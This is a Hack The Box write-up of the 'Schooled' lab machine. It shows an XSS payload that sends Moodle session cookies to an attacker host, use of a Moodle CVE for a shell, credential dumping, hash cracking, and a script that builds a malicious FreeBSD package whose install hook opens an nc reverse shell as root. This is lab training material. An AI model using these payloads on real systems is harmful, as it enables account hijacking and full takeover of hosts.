Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Schooled
|htbmachinesretired|

Summary

Schooled, a FreeBSD machine on Hackthebox created by user TheCyberGeek was a medium difficulty machine. Initial foothold on this machine was Cross-Site Scripting (XSS) attack to steal Teacher cookie. After getting Teacher account It was about using an CVE CVE-2020-14321 to get an RCE and a shell. After getting shell on the box it is about finding a hash cracking it and using that password to get user on the box. Privilege Escalation on the box was about creating a malicious package and installing it which get us root.

Initial Enumeration

nmap

1
$ nmap -sC -sV -oN nmap/schooled  10.10.10.234
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-04 12:27 IST
Nmap scan report for 10.10.10.234
Host is up (0.083s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
|   2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
|   256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
|_  256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds

we see two ports open 22 and 80 from SSH banner we know it is (FreeBSD 20200214; protocol 2.0)

Lets Enumerate more on 80

Web (80)

from page we find an email admissions@schooled.htb so i kept that in note

I also added schoooled.htb in my hosts to see if we get something else

from teachers.html

So i created a names for potential usernames

1
curl -s http://schooled.htb/teachers.html | grep '<h3 class="title">' | cut -d'>' -f2 | cut -d'<' -f1 > names.txt

While doing these manual enumeration i was also running gobuster to do directory and vhost enumeration and in vhost enumeration i found a subdomain as

moodle.schooled.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
└──╼ $ gobuster vhost -w "/opt/tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt" -u "http://schooled.htb"
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://schooled.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /opt/tools/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2021/04/04 12:42:56 Starting gobuster in VHOST enumeration mode
===============================================================
Found: moodle.schooled.htb (Status: 200) [Size: 84]

===============================================================
2021/04/04 12:43:47 Finished
===============================================================

so added moodle.schooled.htb in my hosts file

1
$ echo '10.10.10.234 moodle.schooled.htb' >> /etc/hosts

moodle.schooled.htb

from upgrade.txt http://moodle.schooled.htb/moodle/lib/upgrade.txt page we find the version to be 3.9

seeing an register page i tried to register myself

we get an error as only student.schooled.htb can register that so i add that domain to my hosts file to check later

and registered and account with that email domain.

After that i started playing with the application and Enrolled myself to Mathematics course and tried sending an XXS payload to the Teacher.

XXS Confimation

payload:

1
<image src=1 href=1 onerror="javascript:alert(1)"></image>

Now we know we have XSS Lets try to steal cookie from Teacher

1
<img src=x onerror="this.src='http://10.10.14.X:8000/?'+document.cookie; this.removeAttribute('onerror');">

Trying to message the Teacher don’t get me anything.

Checking the Course announcement i saw

So went to my profile and added the XSS payload on my Profile MoodleNet Profile and waiting a few second gave me the cookie

1
2
3
4
5
6
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.23 - - [04/Apr/2021 13:08:07] "GET /?MoodleSession=cjdpon0sak8e9kdbhauombsi0r HTTP/1.1" 200 -
10.10.14.23 - - [04/Apr/2021 13:09:06] "GET /?MoodleSession=cjdpon0sak8e9kdbhauombsi0r HTTP/1.1" 200 -
10.10.14.23 - - [04/Apr/2021 13:15:40] "GET /?MoodleSession=cjdpon0sak8e9kdbhauombsi0r HTTP/1.1" 200 -
10.10.10.234 - - [04/Apr/2021 13:16:21] "GET /?MoodleSession=j41ehgdm2admi1puitrleplieu HTTP/1.1" 200 -

Using that i get a session as Manuel Phillips After this I was stuck on this for very long and googling around i found an CVE-2020-14321 and a video github

following the step in the video i was able to get a shell as www

www

Enumerating the box I found db credentials as moodle:PlaybookMaster2020

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
[www@Schooled /usr/local/www/apache24/data/moodle]$ cat config.php
<?php  // Moodle configuration file

unset($CFG);
global $CFG;
$CFG = new stdClass();

$CFG->dbtype    = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'moodle';
$CFG->dbpass    = 'PlaybookMaster2020';
$CFG->prefix    = 'mdl_';
$CFG->dboptions = array (
  'dbpersist' => 0,
  'dbport' => 3306,
  'dbsocket' => '',
  'dbcollation' => 'utf8_unicode_ci',
);

$CFG->wwwroot   = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot  = '/usr/local/www/apache24/moodledata';
$CFG->admin     = 'admin';

$CFG->directorypermissions = 0777;

require_once(__DIR__ . '/lib/setup.php');

// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!

trying 

1
$ mysql -u moodle -D moodle

gave me an error as mysql binary not found but doing 

1
2
$ find -name 'mysql` / 2>/dev/null

gave me mysql was present on the box in /usr/local/bin

1
/usr/local/bin/mysql -u moodle -D moodle -p -e "select * from mdl_user"

using that i connected to the database and grabbed admin user password hash as $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW

Cracking the password using john

1
2
3
4
$ john --wordlist=/usr/share/wordlist/rockyou hash
...[snip]...
!QAZ2wsx
--- [snip]...

as the email id for admin was jamie@staff.schooled.htb I tried the same password on ssh for jamie user which get us user

User (Jamie)

1
2
3
4
5
6
7
$ sshpass -p '!QAZ2wsx' ssh jamie@10.10.10.234
...[snip]...
jamie@Schooled:~ $ whoami;hostname;date;
jamie
Schooled
Sun Apr  4 12:42:05 BST 2021
jamie@Schooled:~ $

Privelege Escaltion (Jamie -> Root)

Checking sudo -l

1
2
3
4
jamie@Schooled:~ $ sudo -l
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *

we see we can install a pkg without password

so lets create a malicious package and try installing it

I used blog
exploit 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
#!/bin/sh

STAGEDIR=/tmp/stage
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}

cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
pw usermod -n root -s /bin/csh
EOF

cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.X.X 4444 >/tmp/f
EOF

cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: f3v3r
version: "1.0_6"
origin: sysutils/f3v3r
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF

echo "deps: {" >> ${STAGEDIR}/+MANIFEST
pkg query "  %n: { version: \"%v\", origin: %o }" portlint >> ${STAGEDIR}/+MANIFEST
pkg query "  %n: { version: \"%v\", origin: %o }" poudriere >> ${STAGEDIR}/+MANIFEST
echo "}" >> ${STAGEDIR}/+MANIFEST

mkdir -p ${STAGEDIR}/usr/local/etc
echo "# hello world" > ${STAGEDIR}/usr/local/etc/my.conf
echo "/usr/local/etc/my.conf" > ${STAGEDIR}/plist

pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o .

and tried installing the pkg

1
2
3
jamie@Schooled:/tmp/.f3v3r $ sudo pkg install  *.txz
Updating FreeBSD repository catalogue...
pkg: Repository FreeBSD has a wrong packagesite, need to re-create database

but got this error checking the man page of pkg-install

we see an option as --no-repo-update

running 

1
2
3
4
5
6
7
8
9
10
11
12
$ sudo pkg install --no-repo-update  *.txz
pkg: Repository FreeBSD has a wrong packagesite, need to re-create database
..[snip]..
New packages to be INSTALLED:
        f3v3r: 1.0_6

Number of packages to be installed: 1

Proceed with this action? [y/N]: y
[1/1] Installing f3v3r-1.0_6...
Extracting f3v3r-1.0_6: 100%
Registering root shell

and we get a reverse shell as root

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/schooled/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
cveactivemediumxsshtbmachinesfreebsdpassword crackingpkg